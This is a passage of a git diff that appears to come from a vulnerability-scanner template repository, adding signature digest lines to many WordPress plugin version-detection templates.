regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100996dd0df1cced1f7912da6797c847a6250bd650d8b481ec6de2582246c42569a022100e34364209d6dc8ba574344d837d96d499d1056a193179b2b8aa214902105a1eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..ccce570cfc 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a1b5a9c535534e528fea5ed6b457f797ddb51c01a384c8505e32f7680b4f6db5022041417f43efd0931358b94eb2b2156494d6fb5227a649780a448ed4a14d90dba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..57b5ffcab4 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c03c1160107ccf2ac946a01fa6e3dbcfef5ea7a059c52360225887fb87e1b8af022100ac7a1023faa60a230d03fd69f7ab168a7e271bd8b56e56abe7b02ceb0a902a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..aaf4413330 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6c5f97993c8eb370c12fbea81e9a00d900dbea6fddb07fac3e0e2a08e20e666022100c8bc0a22f437c2159693080ac5cfcb56320284b4db599da8bc484855d8bb9651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..09c41765f9 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022069604dcf2ae28954369e7bd54284cf0b49bed76bd849d30d56ec96fcd2448f1002203a1e675925120cc61755ef69e0c802a5b2f2384de086eb9c2b357905094c36e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 6ff90e0902..40bbfa3b12 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201599ea8d8c90c330ca17825a536e54f3e4a0169da2ae2692179e0a35ffd6eac102210097c679c3a1895da0a426af5a25f84f98c6a77dd7d5306d776f8f64b668e49357:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..2fdf7c8f5d 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064d00d4b054df1f46ffa41623233c5d7a1367f0bae3e17a45a6530aecc87ba5002206fd2d00b661a129cc26f7ae97b327cdf49189539d961d0b248f77842e8d8ddab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..1dbb860dfa 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022005176b3dc6a9cf06f664b4f0c93b3fddd7b7ed04908b3f7a4c06a70e41c95f8c022100d568d140b05b9ea6609cb4cb86502bffa0ca4500784a02e71a07f2a49cc200b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 27e45e39ca..a6f0f21814 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f89e2fe9db31ed10326a28e9a6081de663bc01fefef961c4bcbc5adf002df9402203f7d9429f4cde622ca1d7b1182efc3b51d5801b41fa8f1d5d4bbc25a9d7cd6da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..2c2a21d216 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204412c841653647144b58be8ba2a20f6cc77d5839672b22484654bcf306ce8172022100fb3ea1c77c09d429a479c29099ac8068052a74993749fb5b270e62794f773f3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index d679d8df61..8e00868bf5 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066cb2e4e9983af22b85f943380c05aa036d92841985fef5d6761a93016103c63022100af17885de626414de838912165f8c814490fced8e9c69b7fea2c1c9395110c5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 8bfe16ca84..be0b7c1e58 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085842a196bae35b208e77c81a44de8345a0d6237f62a23eac81512600ff525d3022100c65342fcf385a5e4edecf023ba72715c9478fa5344cd631ae40a18eb61806b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..87c34b60fa 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ba1532ca1a2cf334d62a7200c620d83a9d036281bd63a59b5e66fb03a670bea902202f597a786cef3355b551734aac201cb449f6b7f9537f543d2fd63fe1e027783f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..191bc244f0 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022074a4a332f6b50c648058407cbcaa734ead6ab5d56f315171028ca3a86d8b98d7022100b6ae37f443b7010733d8a85bd8074a635c16a84ca7fade251f7bb577d38f22f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..093bf84fe9 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b9516fd2c90cca1604c7969edece7a8adc7d28c3bbfae3442fce6509630e671022100e49d0f12a17ae262f9b70b117f0cf1267373cd2b5ab30662254d6a61ccedec1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..34ef2e7386 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210096637f7da8dd1390586889905df9097e6b4486b360f02c4fcc8263ed94f3a7d502207c7da5b993fabac11134d2be99c88b91ad7fe68f176809e8791bc90ff581a425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 67968fb008..6f4ec6be4e 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec585c3dd29738a9ea91b5e30825b67290faac62af343dbbb986d0fa8d8961cf02207f802ebb8ee24e73253293fcd604d9889058474f24607a9f2e9cb9b80628a51c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..c0fe939dff 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206bfb1e5af3d19dc86290db0ae306e451fb81030a8bd4caef19547a2d108aa9ca022100d554d2d67c3d905d2bd9f2775b4d343dd366c823445692ff898419cd53e610e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..fa62e70031 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f226bb10b7b8c656e36bbb1ca4cedeb0b9ad322eafcd192dc6b3a081044d97f022079d1f2ae385ce401bbd9d5b2a55f8952c145f2e2414c220468f6569145a35023:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..45987b21f6 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bfd2787d98bd8b4508bf776d70f2295f637789de94834f2d79a37aa3d0e99074022100c8bb528a5b8be1fc2489c02fd229111b6e3568f6bf9937398665720c22e1f7a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..e231d0060d 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220266f767156e57bd0901402080068621a19620a1d0e8ae80850f9ebf9dea9f74302205714037637414c1d8d5a4a52bda02ecbc518ea5178c1ae35a05b46a1b8d790b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 2d4f463d97..346e2b843f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205152ff3ab8ff7eae0aa884afa3638d8ecfbf5c23bbbef1448e91518f75d5a7e3022033b782542009cc8cd10e8a2ee2ed54ceb9343f05f42e59079b4ae11c1c4feebc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index cb67671918..2f2f5ef98f 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025d87dbfdf4d1d0f8f5f72967a7bce612f254fb7a9cfd499d801fc48b8906a32022100f418c2a9c8ba58ead2ec02ba448ddfeeb88854a14ceac128fbbe2ba86d806adf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index cc3eb2481a..222d49176d 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202892ba4c67c0f74cd8376f4b4bf4821b2f18803ab045dc726baf4a089ffb5883022100fda87d8f02cf4c8f2d9fbac0112f1e75669b7e4396ad0b01889f135c52237a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..5b0058a300 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008211f48fc6849f45232e3741b1a0183932ddafbe0daf15bb99fe33f441943325022100a82a77b01d8e6ce6b47c1e196b87657e1d8ffe80dffd58a2d3cf493996a7aa56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..e7df6a1169 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066148125142164a1cf8719c3e4508fbc69ee18e00bd9b9a0a109df92a8bfa472022100c4ba5594ddd9cf6b75b672e7bafae6bc11518c9b32dce4cd01d001133531c396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..882f45de14 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220115da608ff4c16fbf0f7085b863088ecdd1cd51ccb6174918f519bbb31bf2712022100ba4305b755c0ca215565335e2ff3267cca2238c9a0b4ff1ca96fbdb09eb4850d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..c55df8a16a 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220294157a7003cf59591bc88ee2223e29abef363631e709a68b37e9aa1b050de29022100cd7b5e304e1216a19704a43b0be3e53791101797ce88f53a03c103e978d10712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..c81f0de44d 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201be6cba042323dd834ae6b475f1925ccc6f2958a942c661f9147c1c2013f765e02203df60ad0023974d0851e893e754b607a4e2a9b2e5274f860b05234f5af420e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..eaf697bda0 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ef604856d4869df6c5d802e7597e7a5e7233525af89354cb262e19bbed469c8702205502f5df35eee809a905d9bdad8233b9cd3c24bcdd366dbe7fbe9bf2796386c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 69c367b8d5..9c562106e3 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f65c8f6e84218918e685fe599e366fab5c5470da6ec13cde50e8d3bbfb94605e02206ee131007de9da6dd1ad0b13057c99b9b272ab11e4f8c53dc140431440a704a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..2645fe3bb6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220023e0a6d2a87f31e55d1859c6bee3f5b19be08111cf26414ce0d0a4e060c59570220008444c713edd550c6876876dea296884c2e064f2607cc09ed9a350dbaacb8a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..b8091777a7 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d69b798103bedf6eee20780cd2884322d361f4dea3a0e8b169d18b1ceb5829a022059806a650073157bd76dd08d82687f598e293db2d30b2d765b5b96b84103a41a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..212edcc90a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f18478366d1d75dc337f291a29eb00dac02497ff082a7a8f5ab9df483c7100e5022100c8301485889826581e57c75efcb7a8001bf23ea9ab518c209daf0bd0dbe1552d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..83623e19fc 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022041f60004469d1032b3efccdd6f24ea8f33b4df7217fdb5ef287df1007c0adebd02201a40accd6a0701541f9c258e87028b7bb7f281b4b670ed8d2279888f8a79b922:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..82ff89eeff 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ca2323e5112269724e0018c4bb9301435d86b6bc2915c05a6dadf0420a5178f022100c91bb60f095f4f40725392da193a0ffcc6002f03fe5891962da0892399c91445:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..cbe1bd9c32 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022061938f7e423aac5afda6f5b813b45534dcc858f5df260b3494dc5f8f3643fea70221008363f75f82f9e5a1b6cc9165c901661dfecc945939d1ee9f8ed95914ca2107ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 9d77ce9155..3f2f3b9931 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a60fe8e659b8401a9a6cfdf042e23cd55936ad0d661a52dfdc41b427677e7c7c02207461a5ac4931ccbc763781bbfd8a37cdc001270b53ede586cfa743a29d740e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..233faf4b87 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c62a2215388170593aae13343d7d63fc0dacd8932ddf4ce9e04ffbeeb1705f35022100bb33bed0ef87a9ad39dfdd6dc60a5cf751a02ea1d7e956813f6055df409dbea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..87ab589469 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068bc9f0d70430d3c80a0c221901903b4d9b5c0ae03c0bc7c9ef39a80e583af7e022013c5bf3b53fd920c6f017483d62fceb39264ba48f514c15b7d4acff6dae7bc4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..4bd98afbd4 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205611e2c637583565433ea8ac8f0eb80003cf758c44dbd449cde9c0c4070f0d95022100f25a37184b7a44f26c4bb880254307aad431cc0f54622caa0b383a8c114baa54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 34d36d4349..c47ab8e71f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c0b244000d32b33644d0058e797e3b86534a861c8f35d78dc4780608c75918d30220067a1b5ca07d3747f95dc1c59ba76ef89522946c18569467844486e607afe4ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..90f0ad53ee 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e9e4b3105d4b421b8421d20a48dcc18b977a2d92025fe157d2f45f9b275274f902210090260235519d7dacd016cb3e49b6fd389e182595cd0bf2b565e35599c72a3f58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 39b176dcb8..d8778e3dda 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220411d00666ef7f301cf45fe43a8635263725f5100eb5fc8ab57a4c23fff445bef022100d986f15698ddd73a7691013176b596e2a387615335c4f56304e0aa0ef1ff9fb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..0c14796d45 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202e239188d08735cfec914cf526387195ee77bd0a43bea6a32a02ccbbaff24c9e022100e67e407605a6fb06eba663c7b91a7ed4ba7f8bc967016a98d0f36601bb2135de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..0011f13c1d 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b29bbae1a19fde9a5752dea86ce82c2b55acb6662d230b0d61f0ccab1f77e749022078f3d119aa320db4db880df66fa3aff9dc0b5c86a498ba7f8d47ac05cb1d4e49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..db0e309a56 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220088aba7122f7911df167c18a7d3b65e8b541af4803d320b4275935f3d02ddea9022100cc03b88e93b697a02ef53c94cd63dec4858c7a9c87490814c0d187bb9ebb6b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..733ef4be65 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 